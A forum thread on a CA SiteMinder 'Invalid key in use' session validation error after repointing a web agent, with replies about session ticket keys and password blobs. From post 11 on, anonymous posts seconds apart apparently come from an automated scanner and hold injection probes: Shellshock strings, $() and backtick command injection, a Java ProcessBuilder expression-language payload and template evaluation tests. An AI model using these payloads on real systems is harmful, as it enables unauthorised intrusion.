Layer7 Access Management

Expand all | Collapse all

Session Validation Error

Jump to Best Answer

Anon Anon10-19-2016 09:28 AM

Anon Anon10-19-2016 09:28 AM

Anon Anon10-19-2016 09:28 AM

Anon Anon10-19-2016 09:28 AM

Anon Anon10-19-2016 09:29 AM

Anon Anon10-19-2016 09:29 AM

Anon Anon10-19-2016 09:29 AM

Anon Anon10-19-2016 09:29 AM

Anon Anon10-19-2016 09:29 AM

Anon Anon10-19-2016 09:29 AM

Anon Anon10-19-2016 09:29 AM

Anon Anon10-19-2016 09:30 AM

Anon Anon10-19-2016 09:30 AM

Anon Anon10-19-2016 09:30 AM

Anon Anon10-19-2016 09:30 AM

Anon Anon10-19-2016 09:30 AM

Anon Anon10-19-2016 09:31 AM

Anon Anon10-19-2016 09:31 AM

Anon Anon10-19-2016 09:31 AM

Anon Anon10-19-2016 09:31 AM

Anon Anon10-19-2016 09:31 AM

Anon Anon10-19-2016 09:32 AM

Anon Anon10-19-2016 09:32 AM

Anon Anon10-19-2016 09:32 AM

Anon Anon10-19-2016 09:32 AM

  • 1.  Session Validation Error

    Posted 10-17-2016 06:37 PM

    Hi,

     

    We are getting below issue after pointing(Without Host re-registration) the WebAgent(R12SP3CR09) on application webserver from SiteMinder R12 environment to R12.52 SP02 environment. Even after successful authentication user is still getting the login page.

     

    SMAccess logs on policy server -

     

    AuthAccept AAP45 [17/Oct/2016:00:18:36 -0700] "xx.xx.***.x <UserDN>" " apps-agent GET /apps/store/test.jsp " [idletime=0;maxtime=670794924;authlevel=4;] [0]  [] []

    AuthAccept AAP45 [17/Oct/2016:00:18:44 -0700] "xx.xx.***.x <UserDN>" " apps-agent GET /apps/store/test.jsp " [idletime=0;maxtime=670794916;authlevel=4;] [0]  [] []

    AuthAccept AAP45 [17/Oct/2016:00:18:51 -0700] "xx.xx.***.x <UserDN>" " apps-agent GET /apps/store/test.jsp " [idletime=0;maxtime=670794909;authlevel=4;] [0]  [] []

    AuthAccept AAP45 [17/Oct/2016:00:19:00 -0700] "xx.xx.***.x <UserDN>" " apps-agent GET /apps/store/test.jsp " [idletime=0;maxtime=670794900;authlevel=4;] [0]  [] []

    ValidateReject AAP45 [17/Oct/2016:00:19:30 -0700] "xx.xx.xxxx " " apps-agent GET /apps/store" [] [2] Invalid key in use [] []

     

    It seems like policy server failed to validate the session. AuthReason 2 shows Invalid Session.

    Is it issue because of session ticket key? If yes, then how it’s working fine for an application which we migrated/repointed from R12 & R12.52 environment.

     

    The webagent(Pointed to R12.52) logs on centralized server serving the login pages shows below error message –

    [WARNING] Unable to process SMSESSION cookie.

     

    Additional details – All policy servers in R12.52 environment are having same encryption key and pointed to a common key store collated with Policy store. One of the policy server is configured to Generate the agent keys.

    We have not yet checked the application WebAgent logs.

     

    Can you please help with above issue?



  • 2.  Re: Session Validation Error

    Posted 10-18-2016 10:53 AM

    Hello VVK,

     

    Please find below KB with general information on the reported error:

    TEC497745

    http://www.ca.com/us/services-support/ca-support/ca-support-online/knowledge-base-articles.tec497745.html


    However, your case appears to be a bit different from issue reported in the above KB.

     

    You may want to open a support case and share following
    registry export from both Policy servers:

    HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Netegrity\SiteMinder

     

    Thanks and Regards,

    Osarobo



  • 3.  Re: Session Validation Error

    Posted 10-18-2016 02:26 PM

    Yes, The error "Invalid Key in use" means Policy server is unable to decrypt the Session Spec contained within the SMSESSION using it's current Session Ticket/Persistent Key.


    Do you have dynamic session ticket key rollover or multiple keystore?



  • 4.  Re: Session Validation Error

    Posted 10-18-2016 05:08 PM

    Hi Ujwol,

     

    We are using a common key store for all policy servers in R12.52 environment and no dynamic session ticket key rollover done. There is no session ticket key defined using Admin UI.

     

    Regards,

    Vishal



  • 5.  Re: Session Validation Error

    Posted 10-18-2016 08:20 PM

    May be that's the issue. Can you try setting a static session ticket key?



  • 6.  Re: Session Validation Error

    Posted 10-18-2016 10:58 PM

    I tried to export the session ticket from R12 environment in clear text, however I can see all the keys are encrypted(RC2- FIPS Compat). I guess this is known issue with R12SP3.

     

    I am wondering how the other application migrated  to R12.52 is working fine as we didn't setup any static session ticket key in R12.52. Even we didn't get any sort of issues in lower environment.



  • 7.  Re: Session Validation Error

    Posted 10-19-2016 08:20 AM

    Hi VK,


    I suggest opening a support ticket for this issue as it might need some indepth review of your key store and ps trace logs.


    Regards,

    Ujwol





  • 8.  Re: Session Validation Error

    Posted 10-21-2016 01:23 AM

    Hi Ujwol,

     

    I have opened up a case with CA support team. Case# 00583086. Appreciate if you can see the logs attached(Policy server access and WA logs) and suggest the things needs to be looked upon.

     

    Also, Password blob attribute seems to be wiped out due to new encryption key used in R12.52. We are unaware of encryption key set for R12 environment and we don't want to reset it. Is there any way you suggest to get the PasswordBlob data with minimal changes & impact.



  • 9.  Re: Session Validation Error

    Posted 10-21-2016 02:05 AM

    Unfortunately there is no way to migrate/export/import password blob.

    If the Persistent Key (not only Encryption Key) is reset, the existing password blob will no more be valid.

    Tech Tip - CA Single Sign-On:Policy Server:Persistent Key/Session Ticket Key Introduced 



  • 10.  Re: Session Validation Error

    Posted 10-19-2016 09:05 AM
      |   view attached

    Attachment(s)

    zip
    test.html.zip   156B 1 version


  • 11.  Re: Session Validation Error

    Posted 10-19-2016 09:28 AM
    () { :;}; /bin/sleep 11


  • 12.  Re: Session Validation Error

    Posted 10-19-2016 09:28 AM
    () { :;}; /bin/sleep 0


  • 13.  Re: Session Validation Error

    Posted 10-19-2016 09:28 AM
    `sleep 0`


  • 14.  Re: Session Validation Error

    Posted 10-19-2016 09:28 AM
    `sleep 11`


  • 15.  Re: Session Validation Error

    Posted 10-19-2016 09:29 AM
    320*3269


  • 16.  Re: Session Validation Error

    Posted 10-19-2016 09:29 AM
    () { _; } >_[$($())] { /bin/sleep 11; }


  • 17.  Re: Session Validation Error

    Posted 10-19-2016 09:29 AM
    ${(new java.io.BufferedReader(new java.io.InputStreamReader(((new java.lang.ProcessBuilder(new java.lang.String[]{"timeout","11"})).start()).getInputStream()))).readLine()}${(new java.io.BufferedReader(new java.io.InputStreamReader(((new java.lang.ProcessBuilder(new java.lang.String[]{"sleep","11"})).start()).getInputStream()))).readLine()}


  • 18.  Re: Session Validation Error

    Posted 10-19-2016 09:29 AM
    $(sleep 11)


  • 19.  Re: Session Validation Error

    Posted 10-19-2016 09:29 AM
    () { _; } >_[$($())] { /bin/sleep 0; }


  • 20.  Re: Session Validation Error

    Posted 10-19-2016 09:29 AM
    () { _; } >_[$($())] { /bin/sleep 11; }


  • 21.  Re: Session Validation Error

    Posted 10-19-2016 09:29 AM
    |sleep 11 & ping -n 11 localhost


  • 22.  Re: Session Validation Error

    Posted 10-19-2016 09:29 AM
    %{9409*3080}


  • 23.  Re: Session Validation Error

    Posted 10-19-2016 09:30 AM
    ${applicationScope}


  • 24.  Re: Session Validation Error

    Posted 10-19-2016 09:30 AM
    a'a\'b"c>?>%}}%%>c<[[?${{%}}cake\


  • 25.  Re: Session Validation Error

    Posted 10-19-2016 09:30 AM
    ${9767*6894}


  • 26.  Re: Session Validation Error

    Posted 10-19-2016 09:30 AM
    #{applicationScope}


  • 27.  Re: Session Validation Error

    Posted 10-19-2016 09:30 AM
    k98c''ljsc


  • 28.  Re: Session Validation Error